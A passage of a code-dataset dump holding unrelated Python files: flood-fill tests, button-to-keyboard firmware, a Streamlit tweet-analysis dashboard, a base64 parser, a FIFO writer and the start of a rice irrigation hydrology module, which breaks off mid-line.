0, 0, 0, 1],\n [0, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 0]]\n\ndef test_seed_point_in_middle():\n seed_point = (2,4)\n filled_image = fill(example_image, seed_point) \n expected_image = [[0, 0, 0, 0, 0, 0],\n [1, 0, 
1, 1, 1, 0],\n [0, 1, 2, 2, 2, 1],\n [0, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 0]] \n assert(filled_image == expected_image)\n\n\ndef test_seed_point_on_bottom():\n seed_point = (3,1)\n filled_image = fill(example_image, seed_point) \n expected_image = [[0, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0],\n [2, 1, 0, 0, 0, 1],\n [2, 2, 1, 1, 1, 2],\n [2, 2, 2, 2, 2, 2]]\n assert(filled_image[2] == expected_image[2])\n\n\ndef test_seed_point_on_top():\n seed_point = (0,5)\n filled_image = fill(example_image, seed_point) \n expected_image = [[2, 2, 2, 2, 2, 2],\n [1, 2, 1, 1, 1, 2],\n [0, 1, 0, 0, 0, 1],\n [0, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 0]]\n assert(filled_image == expected_image) \n \n\n# Test for a 15*15 image\ndef test_median_image():\n median_image = load_image(\"data/snake.txt\")\n seed_point = (3,6)\n filled_image = fill(median_image, seed_point)\n expected_image = [[0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0],\n [0, 0, 1, 2, 1, 2, 2, 2, 1, 2, 1, 0, 0, 0, 0],\n [0, 0, 1, 2, 1, 2, 2, 2, 1, 2, 2, 1, 0, 0, 0],\n [0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0],\n [0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],\n [0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0],\n [0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0],\n [1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1],\n [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1],\n [0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0]]\n assert(filled_image == expected_image)\n\n\n# Test for cases of invalid seed points\n# On the 5*6 image as an example\ndef test_non_integer_seedpoint():\n seed_point = (2.5,3) \n filled_image = fill(example_image, seed_point) \n assert(filled_image == example_image)\n\ndef test_seedpoint_with_negative_coordinate():\n seed_point = (-1,3) \n filled_image = fill(example_image, seed_point)\n assert(filled_image == example_image)\n \ndef test_outbound_seedpoint():\n seed_point = (6,3) \n filled_image = fill(example_image, seed_point)\n assert(filled_image == example_image)\n \ndef test_seedpoint_at_boundary():\n seed_point = (2,1) \n filled_image = fill(example_image, seed_point)\n assert(filled_image == example_image)\n\n\n# Running the tests \ntest_one_pixel()\ntest_small_image()\ntest_median_image()\ntest_seed_point_in_middle()\ntest_seed_point_on_bottom()\ntest_seed_point_on_top()\ntest_non_integer_seedpoint()\ntest_seedpoint_with_negative_coordinate()\ntest_outbound_seedpoint()\ntest_seedpoint_at_boundary()\n\n\ndef example_fill():\n image = load_image(\"data/bar.txt\")\n\n print(\"Before filling:\")\n show_image(image)\n\n image = fill(image=image, seed_point=(7, 3))\n\n print(\"-\" * 25)\n print(\"After filling:\")\n show_image(image)\n\n\nif __name__ == '__main__':\n example_fill()\n","repo_name":"CharlizeY/AI-term-1","sub_path":"Python Programming/CW1/python_cw1_yy3219/bucket_fill.py","file_name":"bucket_fill.py","file_ext":"py","file_size_in_byte":9604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74628305767","text":"import board\nimport digitalio\nimport time\nimport usb_hid\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keycode import Keycode\n\n# Pin definitions\nbutton_pin_a = digitalio.DigitalInOut(board.A0)\nbutton_pin_a.direction = digitalio.Direction.INPUT\nbutton_pin_a.pull = digitalio.Pull.UP\n\nbutton_pin_s = 
digitalio.DigitalInOut(board.A1)\nbutton_pin_s.direction = digitalio.Direction.INPUT\nbutton_pin_s.pull = digitalio.Pull.UP\n\nbutton_pin_d = digitalio.DigitalInOut(board.A2)\nbutton_pin_d.direction = digitalio.Direction.INPUT\nbutton_pin_d.pull = digitalio.Pull.UP\n\nbutton_pin_w = digitalio.DigitalInOut(board.A3)\nbutton_pin_w.direction = digitalio.Direction.INPUT\nbutton_pin_w.pull = digitalio.Pull.UP\n\nbutton_pin_o = digitalio.DigitalInOut(board.D13)\nbutton_pin_o.direction = digitalio.Direction.INPUT\nbutton_pin_o.pull = digitalio.Pull.UP\n\nbutton_pin_i = digitalio.DigitalInOut(board.D12)\nbutton_pin_i.direction = digitalio.Direction.INPUT\nbutton_pin_i.pull = digitalio.Pull.UP\n\nbutton_pin_u = digitalio.DigitalInOut(board.D11)\nbutton_pin_u.direction = digitalio.Direction.INPUT\nbutton_pin_u.pull = digitalio.Pull.UP\n\nbutton_pin_j = digitalio.DigitalInOut(board.D10)\nbutton_pin_j.direction = digitalio.Direction.INPUT\nbutton_pin_j.pull = digitalio.Pull.UP\n\nbutton_pin_k = digitalio.DigitalInOut(board.D9)\nbutton_pin_k.direction = digitalio.Direction.INPUT\nbutton_pin_k.pull = digitalio.Pull.UP\n\nbutton_pin_l = digitalio.DigitalInOut(board.D6)\nbutton_pin_l.direction = digitalio.Direction.INPUT\nbutton_pin_l.pull = digitalio.Pull.UP\n\n# Create a Keyboard object\nkbd = Keyboard(usb_hid.devices)\n\n# Function to send the key press\ndef send_key(key):\n kbd.press(key)\n\n# Function to release the key\ndef release_key(key):\n kbd.release(key)\n\n# Main loop\nkeys_pressed = set() # Track the currently pressed keys\nwhile True:\n # Check if the \"A\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_a.value:\n if Keycode.A not in keys_pressed:\n send_key(Keycode.A)\n keys_pressed.add(Keycode.A)\n else:\n if Keycode.A in keys_pressed:\n release_key(Keycode.A)\n keys_pressed.remove(Keycode.A)\n\n # Check if the \"S\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_s.value:\n if Keycode.S not in keys_pressed:\n send_key(Keycode.S)\n keys_pressed.add(Keycode.S)\n else:\n if Keycode.S in keys_pressed:\n release_key(Keycode.S)\n keys_pressed.remove(Keycode.S)\n\n # Check if the \"D\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_d.value:\n if Keycode.D not in keys_pressed:\n send_key(Keycode.D)\n keys_pressed.add(Keycode.D)\n else:\n if Keycode.D in keys_pressed:\n release_key(Keycode.D)\n keys_pressed.remove(Keycode.D)\n\n # Check if the \"W\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_w.value:\n if Keycode.W not in keys_pressed:\n send_key(Keycode.W)\n keys_pressed.add(Keycode.W)\n else:\n if Keycode.W in keys_pressed:\n release_key(Keycode.W)\n keys_pressed.remove(Keycode.W)\n\n # Check if the \"O\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_o.value:\n if Keycode.O not in keys_pressed:\n send_key(Keycode.O)\n keys_pressed.add(Keycode.O)\n else:\n if Keycode.O in keys_pressed:\n release_key(Keycode.O)\n keys_pressed.remove(Keycode.O)\n\n # Check if the \"I\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_i.value:\n if Keycode.I not in keys_pressed:\n send_key(Keycode.I)\n keys_pressed.add(Keycode.I)\n else:\n if Keycode.I in keys_pressed:\n release_key(Keycode.I)\n keys_pressed.remove(Keycode.I)\n\n # Check if the \"U\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_u.value:\n if Keycode.U not in keys_pressed:\n 
send_key(Keycode.U)\n keys_pressed.add(Keycode.U)\n else:\n if Keycode.U in keys_pressed:\n release_key(Keycode.U)\n keys_pressed.remove(Keycode.U)\n\n # Check if the \"J\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_j.value:\n if Keycode.J not in keys_pressed:\n send_key(Keycode.J)\n keys_pressed.add(Keycode.J)\n else:\n if Keycode.J in keys_pressed:\n release_key(Keycode.J)\n keys_pressed.remove(Keycode.J)\n\n # Check if the \"K\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_k.value:\n if Keycode.K not in keys_pressed:\n send_key(Keycode.K)\n keys_pressed.add(Keycode.K)\n else:\n if Keycode.K in keys_pressed:\n release_key(Keycode.K)\n keys_pressed.remove(Keycode.K)\n\n # Check if the \"L\" button is pressed (the pin goes LOW when the button is pressed)\n if not button_pin_l.value:\n if Keycode.L not in keys_pressed:\n send_key(Keycode.L)\n keys_pressed.add(Keycode.L)\n else:\n if Keycode.L in keys_pressed:\n release_key(Keycode.L)\n keys_pressed.remove(Keycode.L)\n\n # Add a small delay to avoid excessive key presses (adjust as needed)\n time.sleep(0.025)\n","repo_name":"TheDemopan/panbox-firmware","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15593751093","text":"import re\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom itertools import chain\nfrom datetime import datetime\nfrom wordcloud import WordCloud\n\nimport components\n\nDISPLAY_DATE_SLIDER = False\n\n\nif __name__ == '__main__':\n\tst.markdown('', unsafe_allow_html=True)\n\tst.markdown('', unsafe_allow_html=True)\n\tst.markdown('Fork me on GitHub', unsafe_allow_html=True)\n\n\tst.title(\":bar_chart: Adana\")\n\n\tst.markdown(body=\"### 1-click analytical dashboard for OSINT researchers\")\n\n\tdf = st.session_state.get(\"df\", None)\n\tif df is None:\n\t\tdf = None\n\t\tdatasets_count = 1\n\n\t\tdatasets = {\n\t\t\t'Bellingcat 2023 mentions': 'data/Bellingcat_Labeled.csv',\n\t\t\t'Russo-Ukrainian War': 'data/RussianUkrainianLabeled.csv',\n\t\t\t'OSINT Zeeschuimer': 'data/OSINT_Zeeschuimer.ndjson',\n\t\t}\n\n\t\toption = ''\n\n\t\tcol1, col2, col3 = st.columns([1,1,1])\n\t\twith col1:\n\t\t\tname = list(datasets.keys())[0]\n\t\t\tif st.button(f'Test example ({name})', type=\"primary\", on_click=lambda: st.session_state.clear()):\n\t\t\t\toption = name\n\t\t\t\tdf = components.process_maltego_csv_file(datasets[name])\n\t\twith col2:\n\t\t\tname = list(datasets.keys())[1]\n\t\t\tif st.button(f'Test example (Russo-Ukrainian War)', type=\"primary\", on_click=lambda: st.session_state.clear()):\n\t\t\t\tdf = components.process_maltego_csv_file(datasets[name])\n\t\t\t\toption = name\n\t\twith col3:\n\t\t\tname = list(datasets.keys())[2]\n\t\t\tif st.button(f'Test example ({name})', type=\"primary\", on_click=lambda: st.session_state.clear()):\n\t\t\t\toption = name\n\t\t\t\tf = open(datasets[option])\n\t\t\t\tdf = components.process_ndjson_file(f)\n\n\t\tif option:\n\t\t\tst.markdown(f\"Rendering test datest '{option}'...\")\n\n\t\tif df is None:\n\t\t\tst.markdown(body=\"\"\"Run test of example dataset analysis OR upload datasets (**you can use several**) of posts. 
\"\"\")\n\n\t\t\twith st.expander(\"Read more about Adana\"):\n\t\t\t\tst.markdown(\"Adana means 'Analytical DAshboard (for NArratives)'.\")\n\t\t\t\tst.markdown(\"Currently Twitter is only supported: Zeeschuimer (Twitter API ndjson) and CSV format\")\n\t\t\t\tst.markdown(\"Remind you that results of analysis depends on the quality of dataset.\")\n\t\t\t\tst.markdown(\"Read [here](https://docs.google.com/document/d/10xOgmZmvLM-BJeak-KNXzkx7H5oqnbn834-o94WbM50/edit#heading=h.1037l5l116z1) how to prepare new datasets.\")\n\n\t\t\tuploaded_files = st.file_uploader(\"Choose a dataset file\", accept_multiple_files=True)\n\n\t\t\tst.markdown(body=\"*[Download datasets examples here](https://drive.google.com/drive/u/0/folders/1GtUZkfD0cZ2xBBZ3FiDpH1Cgw_u-m1wh)*\")\n\t\t\tif not len(uploaded_files):\n\t\t\t\tst.stop()\n\n\t\t\tfor i in range(len(uploaded_files)):\n\t\t\t\tif df is None:\n\t\t\t\t\tdf = components.input_file_to_dataframe(uploaded_files[i])\n\t\t\t\telse:\n\t\t\t\t\tdf = pd.concat([df, components.input_file_to_dataframe(uploaded_files[i])])\n\t\t\t\t\tdatasets_count += 1\n\t\t\t\t\tdf = df.reset_index()\n\n\t\tst.session_state[\"datasets_count\"] = datasets_count\n\t\tst.session_state[\"df\"] = df\n\n\tdef extract_hashtags(text):\n\t\thashtags_list = []\n\t\thashtags = re.findall( r'#[a-zA-Z_-]+', text)\n\t\tfor h in hashtags:\n\t\t\thashtags_list.append(h[1:])\n\t\treturn hashtags_list\n\n\tst.markdown(body=\"Refresh page or open new one for another dataset analysis\")\n\n\tif 'cluster_name' in df:\n\t\tdf = df.rename(columns={\"cluster_name\": \"topic\"})\n\n\tdf[\"datetime\"] = pd.to_datetime(df[\"c_date\"])\n\n\tstart_datetime = datetime.fromtimestamp(df['timestamp_utc'].min())\n\tend_datetime = datetime.fromtimestamp(df['timestamp_utc'].max())\n\n\tdatasets_count = st.session_state['datasets_count']\n\tstatus = [\n\t\tf\"Uploaded {st.session_state['datasets_count']} dataset{'s' if datasets_count > 1 else ''}, {len(df.index)} rows.\",\n\t\tf\"Dataset first date is {start_datetime}, end date is {end_datetime}\"\n\t]\n\tst.markdown('\\n'.join(status))\n\n\tif DISPLAY_DATE_SLIDER:\n\t\tcols1, _ = st.columns((1,1))\n\t\tmax_days = end_datetime - start_datetime\n\t\tslider = cols1.slider('Select date', min_value=start_datetime, value=(start_datetime, end_datetime), max_value=end_datetime)\n\n\tdf['hashtags_list'] = df['text'].apply(extract_hashtags)\n\n\n\n\twith st.sidebar:\n\t\tst.title('Dataset Filter')\n\n\t\tstart_date = pd.to_datetime(st.date_input('Start date: ', start_datetime))\n\t\tend_date = pd.to_datetime(st.date_input('End date: ', end_datetime))\n\n\t\tst.markdown(\"---\")\n\n\n\t\t# if not 'collected_via' in df:\n\t\tdf = df[(df['datetime'] >= start_date) & (df['datetime'] <= end_date)]\n\n\t\tgroup_by_options = [\"total\"]\n\n\t\twith st.expander(\"Filters\"):\n\t\t\tif \"topic\" in df.columns:\n\t\t\t\tgroup_by_options.append(\"topic\")\n\n\t\t\t\tst.title('Topics Filter')\n\t\t\t\ttopics = df[\"topic\"].unique()\n\t\t\t\ttopics = list(sorted(topics))\n\t\t\t\tselected_topics = st.multiselect(\"Topics: \", topics, key=\"topics\", default=topics)\n\t\t\t\tdf = df[df['topic'].isin(selected_topics)]\n\n\t\t\t\tst.markdown(\"---\")\n\n\t\t\tif \"hashtags_list\" in df.columns:\n\t\t\t\tst.title('Hashtags Filter')\n\t\t\t\thashtags = df.explode(\"hashtags_list\")[\"hashtags_list\"].fillna(\"No hashtags\").unique()\n\t\t\t\t# st.write(hashtags)\n\t\t\t\thashtags = list(sorted(hashtags))\n\n\t\t\t\tif hashtags:\n\t\t\t\t\thashtags.remove(\"No 
hashtags\")\n\t\t\t\thashtags.insert(0, \"No hashtags\")\n\t\t\t\tselected_hashtags = st.multiselect(\"Hashtags: \", hashtags, key=\"hashtags\", default=hashtags)\n\n\n\t\t\t\tdef filter_hashtags(hashtags_list):\n\t\t\t\t\treturn all(hashtag in selected_hashtags for hashtag in hashtags_list)\n\n\n\t\t\t\tdf = df[df['hashtags_list'].apply(filter_hashtags)]\n\n\t\t\t\tst.markdown(\"---\")\n\n\t\tst.radio(\"Breakdown by:\", group_by_options, index=len(group_by_options)-1, key=\"group_by\")\n\n\tst.header(f\"Distribution of tweets by time\")\n\ttimeseries = components.tweetdf_to_timeseries(df, frequency=\"1D\")\n\t# timeseries_plot = plot_timeseries(timeseries)\n\tst.bar_chart(timeseries, use_container_width=True)\n\n\thashtags = list(chain.from_iterable(df['hashtags_list'].to_list()))\n\thashtags = list(sorted(hashtags))\n\n\ttopics = components.extract_topics(df, flat_list=hashtags)\n\ttopics_sorted = sorted(topics.items(), key=lambda x: x[1], reverse=True)\n\ttop_topics = topics_sorted[:5]\n\n\tdemo_sentiment_topic_data = False\n\tif 'sentiment' not in df or 'topic' not in df:\n\t\tdemo_sentiment_topic_data = True\n\t\tdf['sentiment'] = np.random.randint(-10, 10, df.shape[0])\n\t\ttopics = ['putin', 'ukraine', 'russia', 'israel']\n\t\tdf['topic'] = np.random.choice(topics, df.shape[0])\n\n\tfig = components.colored_sentiment_plot(df)\n\tst.header(f\"{'[DEMO] ' if demo_sentiment_topic_data else ''}Topics distribution colored by mean sentiment\")\n\tif demo_sentiment_topic_data:\n\t\tst.markdown(f\"**Warning!** This is data for testing purposes, generated randomly for your dataset!\")\n\tst.pyplot(fig)\n\n\tst.header(f\"Change of sentiment over time\")\n\ts_df = df.copy()\n\ttopics = s_df['topic'].unique()\n\ts_df['datetime'] = df['datetime']\n\n\ttopics_df = pd.DataFrame(columns=['sentiment', 'topic', 'datetime'])\n\n\tif st.session_state[\"group_by\"] == \"total\":\n\t\tnew_df = s_df.groupby(s_df['datetime'].dt.month).agg({'sentiment': 'mean', 'datetime': 'min'})\n\t\tnew_df['topic'] = 'total'\n\t\ttopics_df = pd.concat([topics_df, new_df])\n\telse:\n\t\tfor topic in topics:\n\t\t\tnew_df = s_df[s_df['topic'] == topic].groupby(s_df['datetime'].dt.month).agg(\n\t\t\t\t{'sentiment': 'mean', 'datetime': 'min'})\n\t\t\tnew_df['topic'] = topic\n\t\t\t# st.dataframe(new_df)\n\n\t\t\ttopics_df = pd.concat([topics_df, new_df])\n\n\ttopics_df = topics_df.reset_index()\n\tst.line_chart(topics_df, x=\"datetime\", y=\"sentiment\", color='topic')\n\t# # dfc = df.copy()\n\t# # # st.write(dfc.columns)\n\t# # # dfc = dfc.groupby(pd.Grouper(key=\"timestamp_utc\", freq=\"1D\")).mean()\n\t# # # dfc.groupby(pd.Grouper(freq=\"1D\")).mean()\n\t# # dfc[\"timestamp_utc\"] = pd.to_datetime(dfc[\"timestamp_utc\"], unit=\"s\")\n\t# # dfc = dfc.set_index('timestamp_utc')\n\t# # dfc = dfc.groupby([pd.Grouper(freq=\"1W\"), \"topic\"]).mean(numeric_only=True).reset_index()\n\t# # # st.write(dfc)\n\t# st.line_chart(dfc, x=\"timestamp_utc\", y=\"sentiment\", use_container_width=True)\n\n\n\t# https://github.com/ArnelMalubay/Twitter-WordCloud-Generator-using-Streamlit/blob/main/app.py\n\twordcloud = WordCloud(background_color=\"white\", collocations=False).generate(' '.join(hashtags))\n\tfig = plt.figure()\n\tplt.imshow(wordcloud)\n\tplt.axis(\"off\")\n\tst.header(f\"Wordcloud of hashtags\")\n\tst.markdown(\"Detect the most used hashtag in a dataset.\")\n\tst.pyplot(fig)\n\n\tst.header(f\"Top-5 hashtags\")\n\tst.markdown(f\"\"\"`First Tweet URL` means first appearance of a hashtag in a dataset. 
`Most Active User URL` means a\n\t\tlink to username of account wrote the biggest amounts of tweet with a hashtag.\"\"\")\n\n\n\tfirst_tweets, most_active_users = components.get_first_tweets_most_active_users(df, top_topics)\n\thashtags_df = pd.DataFrame(topics_sorted[:5])\n\thashtags_df['first_url'] = first_tweets\n\thashtags_df['most_active_user_url'] = most_active_users\n\thashtags_df.columns = ['Hashtag', 'Count', 'First Tweet URL', 'Most Active User URL']\n\n\tst.dataframe(\n\t\thashtags_df,\n\t\tcolumn_config={\n\t\t\t\"hashtag\": st.column_config.Column(\"Hashtag\"),\n\t\t\t\"count\": st.column_config.Column(\"Count\"),\n\t\t\t\"first_url\": st.column_config.LinkColumn(),\n\t\t\t\"most_active_user_url\": st.column_config.LinkColumn(),\n\t\t},\n\t\thide_index=True\n\t)\n\n\tst.header(f\"Dataframe explorer\")\n\tst.markdown(\"You can search in dataset and download it (buttons in the top right corner of the table).\")\n\tnew_df = df\n\n\tdrop_fields = ['EntityID','EntityType', 'id', 'author_id', 'video_duration', 'video_url', 'icon-url']\n\tfor field in drop_fields:\n\t\tif field in df:\n\t\t\tnew_df = new_df.drop(field, axis='columns')\n\n\tst.dataframe(\n\t\tnew_df,\n\t\tcolumn_config={\n\t\t\t\"author_name\": st.column_config.Column(\"Name\"),\n\t\t\t\"author_alias\": st.column_config.Column(\"Alias\"),\n\t\t\t\"url\": st.column_config.LinkColumn(\"Tweet URL\"),\n\t\t\t\"author_image\": st.column_config.ImageColumn(\n\t\t\t\t\t\"Profile Picture\", help=\"Profile picture preview\"\n\t\t\t),\n\t\t\t\"author_url\": st.column_config.LinkColumn(\"Author URL\"),\n\t\t},\n\t)\n\n\tst.header(f\"{'[DEMO] ' if demo_sentiment_topic_data else ''}Topics and sentiments analysis\")\n\tif demo_sentiment_topic_data:\n\t\tst.markdown(f\"**Warning!** This is data for testing purposes, generated randomly for your dataset!\")\n\n\ttopics = s_df['topic'].unique()\n\ts_df['datetime'] = df['datetime']\n\n\ttopics_df = pd.DataFrame(columns=['sentiment', 'topic', 'datetime'])\n\tfor topic in topics:\n\t\tnew_df = s_df[s_df['topic'] == topic].groupby(s_df['datetime'].dt.month).agg({'sentiment': 'mean', 'datetime': 'min'})\n\t\tnew_df['topic'] = topic\n\t\ttopics_df = pd.concat([topics_df, new_df])\n\n\ttopics_df = topics_df.reset_index()\n\tst.dataframe(topics_df)\n\t# st.line_chart(topics_df, x=\"datetime\", y=\"sentiment\", color='topic')\n\n","repo_name":"soxoj/bellingcat-hackathon-watchcats","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27184689357","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport binascii\n\n\nclass InvalidBase64(ValueError):\n \"\"\"Raised if parsing or decoding cannot continue due to invalid base64.\"\"\"\n\n\ndef padBase64(b64string):\n \"\"\"Re-add any stripped equals sign character padding to a b64 string.\n\n :param string b64string: A base64-encoded string which might have had its\n trailing equals sign (``=``) padding removed.\n :raises ValueError: if there was any error while manipulating the string.\n :returns: A properly-padded (according to the base64 spec: :rfc:`4648`)\n string.\n \"\"\"\n addchars = 0\n try:\n b64string = b64string.strip()\n remainder = len(b64string) % 4\n if 2 <= remainder <= 3:\n addchars = 4 - remainder\n except AttributeError as error:\n raise ValueError(error)\n else:\n if not addchars:\n raise 
ValueError(\"Invalid base64-encoded string: %r\" % b64string)\n b64string += '=' * addchars\n\n return b64string\n\ndef parseUnpaddedBase64(field):\n \"\"\"Parse an unpadded, base64-encoded field.\n\n The **field** will be re-padded, if need be, and then base64 decoded.\n\n :param str field: Should be some base64-encoded thing, with any trailing\n ``=``-characters removed.\n :raises InvalidBase64: if there is an error in either unpadding or decoding\n **field**.\n :rtype: str\n :returns: The base64-decoded **field**.\n \"\"\"\n if field.endswith('='):\n raise InvalidBase64(\"Unpadded, base64-encoded networkstatus field \"\\\n \"must not end with '=': %r\" % field)\n\n try:\n paddedField = padBase64(field) # Add the trailing equals sign back in\n except ValueError as error:\n raise InvalidBase64(error)\n\n debasedField = binascii.a2b_base64(paddedField)\n if not debasedField:\n raise InvalidBase64(\"Base64-encoded networkstatus field %r is invalid!\"\n % field)\n\n return debasedField\n","repo_name":"isislovecruft/bridgedb","sub_path":"bridgedb/parse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"1777833036","text":"#!/usr/bin/env python\n\nimport time\n\nn = 0\nwith open(\"./nmea_fifo\",'w') as fifo:\n while 1:\n fifo.write(\"Line number %d\\n\" % (n, ))\n fifo.flush()\n n += 1\n time.sleep(3)\n\n\n","repo_name":"smr547/distrib_nmea","sub_path":"talker.py","file_name":"talker.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18527395109","text":"from __future__ import absolute_import, print_function\n\nimport numpy as np\n\nfrom ..global_modules.add1 import loadmap\nfrom ..global_modules.settings import MaskInfo, LisSettings\nfrom . 
import HydroModule\n\n\nclass riceirrigation(HydroModule):\n \"\"\"\n # ************************************************************\n # ***** Rice irrigation ************************************\n # ************************************************************\n \"\"\"\n input_files_keys = {'riceIrrigation': ['RiceFlooding', 'RicePercolation', 'RicePlantingDay1',\n 'RiceHarvestDay1', 'RicePlantingDay2', 'RiceHarvestDay2']}\n module_name = 'RiceIrrigation'\n\n def __init__(self, riceirrigation_variable):\n self.var = riceirrigation_variable\n\n # --------------------------------------------------------------------------\n # --------------------------------------------------------------------------\n\n def initial(self):\n \"\"\" initial part of the rice irrigation module\n \"\"\"\n maskinfo = MaskInfo.instance()\n self.var.PaddyRiceWaterAbstractionFromSurfaceWaterM3 = maskinfo.in_zero()\n settings = LisSettings.instance()\n option = settings.options\n if option['riceIrrigation']:\n # ************************************************************\n # ***** PADDY RICE IRRIGATION AND ABSTRACTION ******************\n # ************************************************************\n\n # Additional water for paddy rice cultivation is calculated seperately, as well as additional open water evaporation from rice fields\n # self.var.RiceFlooding = loadmap('RiceFlooding') #original\n self.var.RiceFlooding = loadmap('RiceFlooding')\n # 10 mm for 10 days (total 10cm water)\n # self.var.RicePercolation = loadmap('RicePercolation') #original\n self.var.RicePercolation = loadmap('RicePercolation')\n # FAO: percolation for heavy clay soils: PERC = 2 mm/day\n\n self.var.RicePlantingDay1 = loadmap('RicePlantingDay1')\n # starting day (of the year) of first rice planting\n self.var.RiceHarvestDay1 = loadmap('RiceHarvestDay1')\n # starting day (of the year) of first rice harvest\n\n self.var.RicePlantingDay2 = loadmap('RicePlantingDay2')\n # starting day (of the year) of second rice planting\n self.var.RiceHarvestDay2 = loadmap('RiceHarvestDay2')\n # starting day (of the year) of 2nd rice harvest\n\n def dynamic(self):\n \"\"\" dynamic part of the rice irrigation routine\n inside the water abstraction routine\n \"\"\"\n settings = LisSettings.instance()\n option = settings.options\n maskinfo = MaskInfo.instance()\n if option['riceIrrigation']:\n # water needed for paddy rice is assumed to consist of:\n # phase 1: field preparation: soil saturation (assumed to happen in 10 days, 20 days before planting)\n # phase 2: flood fields (assumed to happen in 10 days, 10 days before planting)\n # phase 3: planting, while keep constant water level during growing season (open water evaporation)\n # phase 4: stop keeping constant water level 20 days before harvest date\n # phase 5: start draining 10 days before harvest date\n # RiceSoilSaturationDemandM3=(WS1-W1Loop1+WS2-W2Loop1)*RiceFraction*MMtoM3;\n # RiceSoilSaturationDemandM3 = (self.var.WS1[0]-self.var.W1[0] + self.var.WS2[0]-self.var.W2[0]) * self.var.RiceFraction * self.var.MMtoM3 #original\n RiceSoilSaturationDemandM3 = (self.var.WS1[0] - self.var.W1[0] + self.var.WS2[0] - self.var.W2[0]) * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay\n # this part is using the whole other fraction to calculate the demand -> an rice only soil part is needed\n # RiceIrrigationDemandM3 unit is m3 per time interval [m3/dt]\n\n pl_20 = self.var.RicePlantingDay1 - 20\n pl_20 = np.where(pl_20 < 0, 365 + pl_20, pl_20)\n pl_10 = self.var.RicePlantingDay1 - 10\n pl_10 = 
np.where(pl_10 < 0, 365 + pl_10, pl_10)\n\n ha_20 = self.var.RiceHarvestDay1 - 20\n ha_20 = np.where(ha_20 < 0, 365 + ha_20, ha_20)\n ha_10 = self.var.RiceHarvestDay1 - 10\n ha_10 = np.where(ha_10 < 0, 365 + ha_10, ha_10)\n\n # for Europe ok, but for Global planting can be on the 330 and harvest on the 90, so harvest < planting\n # or riceplanting = 5 => riceplanting -20 =350 ==> riceplanting < riceplanting -20\n\n \"\"\" phase 1: field preparation: soil saturation (assumed to happen in 10 days, 20 days before planting)\"\"\"\n # RiceSoilSaturationM3=if((CalendarDay ge (RicePlantingDay1-20)) and (CalendarDay le (RicePlantingDay1-10)),0.1*RiceSoilSaturationDemandM3,0)\n RiceSoilSaturationM3 = np.where((self.var.CalendarDay >= pl_20) & (self.var.CalendarDay < pl_10),\n 0.1 * RiceSoilSaturationDemandM3, maskinfo.in_zero())\n # RiceFloodingM3=if((CalendarDay ge (RicePlantingDay1-10)) and (CalendarDay le (RicePlantingDay1)),(RiceFlooding+EWRef)*RiceFraction*MMtoM3,0)\n\n RiceEva = self.var.EWRef - (self.var.ESAct[0] + self.var.Ta[0])\n RiceEva = np.maximum(RiceEva, 0)\n RiceEvaporationDemandM3 = RiceEva * self.var.RiceFraction * self.var.MMtoM3 # m3 per time interval\n # should not happen, but just to be sure that this doesnt go <0\n # part of the evaporation is already taken out in soil module!\n # substracting the soil evaporation and transpiration which was already taken off in the soil module\n\n RiceFloodingDemandM3 = self.var.RiceFlooding * self.var.RiceFraction * self.var.MMtoM3 * self.var.DtDay # m3 per time interval\n\n \"\"\" phase 2: flood fields (assumed to happen in 10 days, 10 days before planting)\"\"\"\n\n # RiceFloodingM3 = np.where((self.var.CalendarDay >= pl_10) & (self.var.CalendarDay < self.var.RicePlantingDay1), (self.var.RiceFlooding+RiceEva)*self.var.RiceFraction*self.var.MMtoM3, maskinfo.in_zero()) #original\n RiceFloodingM3 = np.where(\n (self.var.CalendarDay >= pl_10) & (self.var.CalendarDay < 